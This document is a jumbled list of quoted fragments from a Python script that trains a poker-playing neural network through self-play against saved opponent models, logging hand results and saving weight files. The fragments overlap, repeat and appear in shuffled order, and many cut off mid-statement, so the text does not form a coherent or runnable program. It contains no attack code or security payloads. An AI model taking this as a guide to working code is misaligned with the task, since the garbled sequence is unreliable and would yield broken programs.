"hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment",
"state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0,",
"print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training and go_to_next_level: file_name =",
"action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False # In case of",
"Leveling params saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models = 20 for i",
"training model. Continue where last one left off training_model = m1.create_model_1() training_model.load_weights(file_name) if",
"= m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\",",
"rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds,",
"+ \".h5\" print(\"Went to next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level +=",
"training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st) actions.append(act)",
"training_model.save_weights(file_name) next_level += 1 # Push training model to opponent models opp_models.append(training_model) rnd_odds.append(0)",
"append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo = [state.saldo[0],",
"off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush() for j",
"[100, 0, 0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000",
"[] actions = [] winnings = [] #saldos = [] go_to_next_level = True",
"[] #saldos = [] go_to_next_level = True # Play against opp models for",
"training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush() for j in",
"< len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0,",
"training_epochs #if (saldos[j][0] < 0): # real_epochs *= 2 start_time = time.time() m1.train_model(training_model,",
"state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\",",
"= [] all_actions = [] all_winnings = [] hand_saldo = [] while state.status",
"1), 2)) for st in states: all_states.append(st) for act in actions: all_actions.append(act) for",
"m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False # In case of fold we can",
"hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states = [] all_actions",
"winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time()",
"range(num_hands): print(\"\") print(\"Hand: \", i) states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0,",
"f = open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds,",
"gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) == 0:",
"training_epochs = 30 # Leveling params saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models",
"level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1 # Push training model",
"True training_epochs = 30 # Leveling params saldo_limit_for_next_lvl = 200 next_level = 4",
"opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym = load_gym() f = open(\"log.txt\",",
"rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if",
"score: \", total_saldo[0], \"per hand\") print(\"Bot 1 score: \", total_saldo[1], \"per hand\") print(\"\")",
"j in range(len(states)): real_epochs = training_epochs #if (saldos[j][0] < 0): # real_epochs *=",
"for training.\") return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models = []",
"file=f) f.flush() training_model.save_weights(file_name) next_level += 1 # Push training model to opponent models",
"file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\", file_name, \"\\n\",",
"all_winnings) if len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\")",
"f.flush() if do_training and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went",
"> max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training model. Continue where last",
"state.player_to_act == 0: [action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind],",
"range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time = time.time() st, act, winn, saldo",
"params saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models = 20 for i in",
"playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if",
"num_hands = 4000 what_if_play = True do_training = True training_epochs = 30 #",
"ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1)",
"winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act]",
"do_training and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to next",
"and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\",",
"print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing action ******\") winn = [0, 0]",
"first fold:\", hand_saldo) # randomize new action and continue playing... [action, action_ind], ammount",
"at the moment of first fold:\", hand_saldo) # randomize new action and continue",
"= 30 # Leveling params saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models =",
"opp_names = [] for i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if",
"else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym = load_gym() f = open(\"log.txt\", \"w\")",
"= 20 for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states =",
"= all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand()",
"import action_helpers as ah import dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings): while",
"== 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] =",
"winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\",",
"/= num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per hand\") print(\"Bot 1 score:",
"if state.player_to_act == 0: [action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0) else: [action,",
"all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]]",
"+ 1), 2)) for st in states: all_states.append(st) for act in actions: all_actions.append(act)",
"all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\")",
"state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0: hand_saldo = [0,",
"max_opp_models = 20 for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states",
"file=f) f.flush() states = [] actions = [] winnings = [] #saldos =",
"= [0, 0] for i in range(num_hands): print(\"\") print(\"Hand: \", i) states, actions,",
"go_to_next_level = True # Play against opp models for j in range(len(opp_models)): print(\"Playing",
"ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False # In case of fold",
"0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0:",
"ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo",
"rnd_odds0) else: [action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1) is_fake_action = False #",
"******\") winn = [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn)",
"ah import dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states):",
"[] hand_saldo = [] while state.status != \"hand_finished\": if state.player_to_act == 0: [action,",
"num_hands, what_if_play): all_states = [] all_actions = [] all_winnings = [] total_saldo =",
"return models, rnd_odds, opp_names gym = load_gym() f = open(\"log.txt\", \"w\") training_model =",
"for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time = time.time() st,",
"winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score: \",",
"load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"],",
"def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) < len(all_states): id = len(all_winnings) player_id =",
"playing... if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold -",
"per epoch\", file=f) f.flush() file_name = \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name) print(\"\\nSaved",
"is_fake_action = False # In case of fold we can continue playing... if",
"saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time",
"\"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters =",
"all_winnings, winnings): while len(all_winnings) < len(all_states): id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id])",
"what_if_play) total_saldo[0] += saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] /",
"\"per hand\") print(\"Bot 1 score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \", len(all_states),",
"in actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1] /=",
"----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions,",
"print(\"Taking state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo)",
"opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training and go_to_next_level: file_name = \"model_1_lvl_\" +",
"total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per hand\") print(\"Bot 1",
"m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\",",
"0): # real_epochs *= 2 start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128,",
"opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo)",
"Continue where last one left off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now",
"print(\"Bot 0 score: \", total_saldo[0], \"per hand\") print(\"Bot 1 score: \", total_saldo[1], \"per",
"print(\"Now training\\n\", file=f) f.flush() for j in range(len(states)): real_epochs = training_epochs #if (saldos[j][0]",
"\"\\n\", file=f) f.flush() states = [] actions = [] winnings = [] #saldos",
"time.time() - start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level =",
"and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing action ******\") winn =",
"= time.time() st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands,",
"len(hand_saldo) == 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind]",
"epochs=real_epochs) elapsed_time = time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time",
"action:\", action, ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All winings:\",",
"(i + 1), 2)) for st in states: all_states.append(st) for act in actions:",
"act in actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0] /= num_hands total_saldo[1]",
"return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play):",
"training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f) f.flush() for j in range(len(states)): real_epochs =",
"\", total_saldo[0], \"per hand\") print(\"Bot 1 score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected",
"= [] hand_saldo = [] while state.status != \"hand_finished\": if state.player_to_act == 0:",
"models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make",
"\", len(all_states), \" data pairs for training.\") return all_states, all_actions, all_winnings, total_saldo def",
"model. Continue where last one left off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training:",
"\",\", round(total_saldo[1] / (i + 1), 2)) for st in states: all_states.append(st) for",
"training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\",",
"[] go_to_next_level = True # Play against opp models for j in range(len(opp_models)):",
"winings:\", all_winnings) if len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo",
"states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] +=",
"do_training: print(\"Now training\\n\", file=f) f.flush() for j in range(len(states)): real_epochs = training_epochs #if",
"[0]) num_iters = 50000 num_hands = 4000 what_if_play = True do_training = True",
"print(\"\") print(\"Colected \", len(all_states), \" data pairs for training.\") return all_states, all_actions, all_winnings,",
"next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1 # Push training",
"0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act]",
"1), 2), \",\", round(total_saldo[1] / (i + 1), 2)) for st in states:",
"print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings,",
"in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states = [] actions = []",
"hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand",
"go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) + \".h5\" print(\"Went to next level:\", file_name,",
"len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play): state",
"ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act == 0:",
"file=f) f.flush() for j in range(len(states)): real_epochs = training_epochs #if (saldos[j][0] < 0):",
"= open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models, rnd_odds, opp_name",
"states: all_states.append(st) for act in actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0]",
"last one left off training_model = m1.create_model_1() training_model.load_weights(file_name) if do_training: print(\"Now training\\n\", file=f)",
"if rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym =",
"training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play) elapsed_time = time.time() - start_time states.append(st) actions.append(act) winnings.append(winn)",
"for i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i] == 100:",
"vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training and go_to_next_level: file_name = \"model_1_lvl_\"",
"load_gym() f = open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\") training_model_rnd_odds = 5 #opp_models,",
"hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0], state.saldo[1]])",
"= [] winnings = [] #saldos = [] go_to_next_level = True # Play",
"winnings = [] #saldos = [] go_to_next_level = True # Play against opp",
"action_helpers as ah import dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings)",
"\"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time / num_hands), \"ms per hand\", file=f)",
"randomize new action and continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size,",
"opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new",
"training model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0)",
"while state.status != \"hand_finished\": if state.player_to_act == 0: [action, action_ind], ammount = m1.calculate_action(model0,",
"start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time = time.time()",
"opp_name.pop(0) # Make new training model. Continue where last one left off training_model",
"as ah import dl_model_1 as m1 def append_winnings(all_states, all_winnings, winnings): while len(all_winnings) <",
"= False # In case of fold we can continue playing... if (action",
"if len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final",
"- start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds",
"rnd_odds.pop(0) opp_name.pop(0) # Make new training model. Continue where last one left off",
"round(total_saldo[0] / (i + 1), 2), \",\", round(total_saldo[1] / (i + 1), 2))",
"print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn) if len(hand_saldo) == 0: hand_saldo = [0, 0]",
"rnd_odds, opp_names gym = load_gym() f = open(\"log.txt\", \"w\") training_model = m1.create_model_1() training_model.load_weights(\"weights0012.h5\")",
"\"seconds per epoch\", file=f) f.flush() file_name = \"weights\" + str(i).zfill(4) + \".h5\" training_model.save_weights(file_name)",
"= [] for i in range(len(model_paths)): opp_model = m1.create_model_1() opp_model.load_weights(model_paths[i]) models.append(opp_model) if rnd_odds[i]",
"import time from load_gym import load_gym import action_helpers as ah import dl_model_1 as",
"4 max_opp_models = 20 for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush()",
"total_saldo[0], \"per hand\") print(\"Bot 1 score: \", total_saldo[1], \"per hand\") print(\"\") print(\"Colected \",",
"[0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\", winn) append_winnings(all_states, all_winnings, winn)",
"num_iters = 50000 num_hands = 4000 what_if_play = True do_training = True training_epochs",
"for st in states: all_states.append(st) for act in actions: all_actions.append(act) for winn in",
"st in states: all_states.append(st) for act in actions: all_actions.append(act) for winn in winnings:",
"0, 0]) opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands =",
"what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing action ******\") winn = [0,",
"real_epochs = training_epochs #if (saldos[j][0] < 0): # real_epochs *= 2 start_time =",
"(i + 1), 2), \",\", round(total_saldo[1] / (i + 1), 2)) for st",
"[state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym,",
"round(total_saldo[1] / (i + 1), 2)) for st in states: all_states.append(st) for act",
"model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0)",
"all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play): all_states =",
"opp_name.append(file_name) if len(opp_models) > max_opp_models: opp_models.pop(0) rnd_odds.pop(0) opp_name.pop(0) # Make new training model.",
"+= saldo[0] total_saldo[1] += saldo[1] print(\"Avg saldo per hand:\", round(total_saldo[0] / (i +",
"print(\"\") print(\"Hand: \", i) states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1,",
"- randomizing action ******\") winn = [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] =",
"action ******\") winn = [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size print(\"Winnings:\",",
"start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per",
"what_if_play): state = gym.startHand() all_states = [] all_actions = [] all_winnings = []",
"= load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models, rnd_odds, opp_name =",
"training.\") return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths, rnd_odds): models = [] opp_names",
"\"\\n\", file=f) f.flush() if do_training and go_to_next_level: file_name = \"model_1_lvl_\" + str(next_level).zfill(2) +",
"rnd_odds[i] == 100: opp_names.append(\"random\") else: opp_names.append(model_paths[i]) return models, rnd_odds, opp_names gym = load_gym()",
"hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0, model1,",
"= [] all_winnings = [] total_saldo = [0, 0] for i in range(num_hands):",
"all_states.append(st) for act in actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn) total_saldo[0] /=",
"print(\"Calculated action:\", action, ammount) state = gym.act(action, ammount, is_fake_action) append_winnings(all_states, all_winnings, state.winnings) print(\"All",
"num_hands total_saldo[1] /= num_hands print(\"\") print(\"Bot 0 score: \", total_saldo[0], \"per hand\") print(\"Bot",
"!= \"hand_finished\": if state.player_to_act == 0: [action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0)",
"print(\"Hand: \", i) states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1,",
"id = len(all_winnings) player_id = all_states[id].player_to_act all_winnings.append(winnings[player_id]) def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1,",
"# Leveling params saldo_limit_for_next_lvl = 200 next_level = 4 max_opp_models = 20 for",
"model0, rnd_odds0, model1, rnd_odds1, what_if_play): state = gym.startHand() all_states = [] all_actions =",
"per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\", file=f) f.flush() if do_training and",
"elapsed_time = time.time() - start_time print(\"Trained\", real_epochs, \"epochs in\", round(elapsed_time), \"seconds\", round(elapsed_time /",
"print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def play_manu_hands(gym, model0, rnd_odds0,",
"len(hand_saldo) == 0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand",
"= 4 max_opp_models = 20 for i in range(num_iters): print(\"\\nIteration:\", i, \"\\n\", file=f)",
"action and continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action",
"f.flush() training_model.save_weights(file_name) next_level += 1 # Push training model to opponent models opp_models.append(training_model)",
"# Make new training model. Continue where last one left off training_model =",
"- state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of first fold:\",",
"= -hand_saldo[state.player_to_act] print(\"Hand saldo at the moment of first fold:\", hand_saldo) # randomize",
"[] total_saldo = [0, 0] for i in range(num_hands): print(\"\") print(\"Hand: \", i)",
"\"seconds\", round(1000 * elapsed_time / num_hands), \"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j],",
"0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo at the",
"saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play) total_saldo[0] += saldo[0] total_saldo[1] +=",
"from load_gym import load_gym import action_helpers as ah import dl_model_1 as m1 def",
"the moment of first fold:\", hand_saldo) # randomize new action and continue playing...",
"len(all_states), \" data pairs for training.\") return all_states, all_actions, all_winnings, total_saldo def load_opp_models(model_paths,",
"* elapsed_time / num_hands), \"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo, \"\\n\",",
"= True training_epochs = 30 # Leveling params saldo_limit_for_next_lvl = 200 next_level =",
"if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing",
"in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time = time.time() st, act, winn,",
"(action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\", state.player_to_act, \"wanted to fold - randomizing action",
"real_epochs, 2), \"seconds per epoch\", file=f) f.flush() file_name = \"weights\" + str(i).zfill(4) +",
"opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_01.h5\"], [0]) num_iters = 50000 num_hands = 4000 what_if_play",
"continue playing... [action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True",
"# Push training model to opponent models opp_models.append(training_model) rnd_odds.append(0) opp_name.append(file_name) if len(opp_models) >",
"print(\"\\nIteration:\", i, \"\\n\", file=f) f.flush() states = [] actions = [] winnings =",
"round(elapsed_time), \"seconds\", round(elapsed_time / real_epochs, 2), \"seconds per epoch\", file=f) f.flush() file_name =",
"of fold we can continue playing... if (action == ah.ACTION_FOLD[0]) and what_if_play: print(\"Player:\",",
"0: hand_saldo = [state.saldo[0], state.saldo[1]] print(\"Taking state saldo ----\") print(\"Final hand saldo:\", [state.saldo[0],",
"2 start_time = time.time() m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs) elapsed_time =",
"randomizing action ******\") winn = [0, 0] winn[state.player_to_act] = 0 winn[state.other_player_ind] = state.pot_size",
"rnd_odds1, num_hands, what_if_play): all_states = [] all_actions = [] all_winnings = [] total_saldo",
"j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f) f.flush() start_time = time.time() st, act,",
"go_to_next_level = False print(\"Played\", num_hands, \"hands in\", round(elapsed_time), \"seconds\", round(1000 * elapsed_time /",
"# Play against opp models for j in range(len(opp_models)): print(\"Playing vs\", opp_name[j], file=f)",
"state, rnd_odds1) is_fake_action = False # In case of fold we can continue",
"#opp_models, rnd_odds, opp_name = load_opp_models([\"model_1_lvl_00.h5\", \"model_1_lvl_00.h5\", \"model_1_lvl_01.h5\", \"model_1_lvl_02.h5\"], [100, 0, 0, 0]) opp_models,",
"round(1000 * elapsed_time / num_hands), \"ms per hand\", file=f) print(\"Saldo vs\", opp_name[j], saldo,",
"start_time states.append(st) actions.append(act) winnings.append(winn) #saldos.append(saldo) if saldo[0] < saldo_limit_for_next_lvl: go_to_next_level = False print(\"Played\",",
"saldo:\", [state.saldo[0], state.saldo[1]]) print(\"Returned hand saldo:\", hand_saldo) return all_states, all_actions, all_winnings, hand_saldo def",
"True if state.player_to_act == 0: all_states.append(state) all_actions.append(action_ind) print(\"Calculated action:\", action, ammount) state =",
"winn) if len(hand_saldo) == 0: hand_saldo = [0, 0] hand_saldo[state.player_to_act] = state.stack_size -",
"= [0, 0] hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act] print(\"Hand saldo",
"moment of first fold:\", hand_saldo) # randomize new action and continue playing... [action,",
"i, \"\\n\", file=f) f.flush() states = [] actions = [] winnings = []",
"50000 num_hands = 4000 what_if_play = True do_training = True training_epochs = 30",
"= ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True) is_fake_action = True if state.player_to_act == 0: all_states.append(state)",
"in states: all_states.append(st) for act in actions: all_actions.append(act) for winn in winnings: all_winnings.append(winn)",
"/ real_epochs, 2), \"seconds per epoch\", file=f) f.flush() file_name = \"weights\" + str(i).zfill(4)",
"\".h5\" print(\"Went to next level:\", file_name, \"\\n\", file=f) f.flush() training_model.save_weights(file_name) next_level += 1",
"in range(len(states)): real_epochs = training_epochs #if (saldos[j][0] < 0): # real_epochs *= 2",
